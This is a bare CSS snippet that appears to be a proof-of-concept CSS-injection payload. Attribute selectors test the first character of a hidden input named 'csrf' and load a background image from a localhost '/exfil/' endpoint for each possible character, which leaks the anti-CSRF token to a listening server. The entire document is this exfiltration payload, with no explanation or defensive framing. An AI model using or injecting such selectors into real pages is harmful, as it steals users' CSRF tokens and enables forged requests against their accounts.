input[name=csrf][value^=a]{
    background-image: url(https://localhost:9000/exfil/a);
}
input[name=csrf][value^=b]{
    background-image: url(https://localhost:9000/exfil/b);
}
/* ... */
input[name=csrf][value^=9]{
    background-image: url(https://localhost:9000/exfil/9);   
}
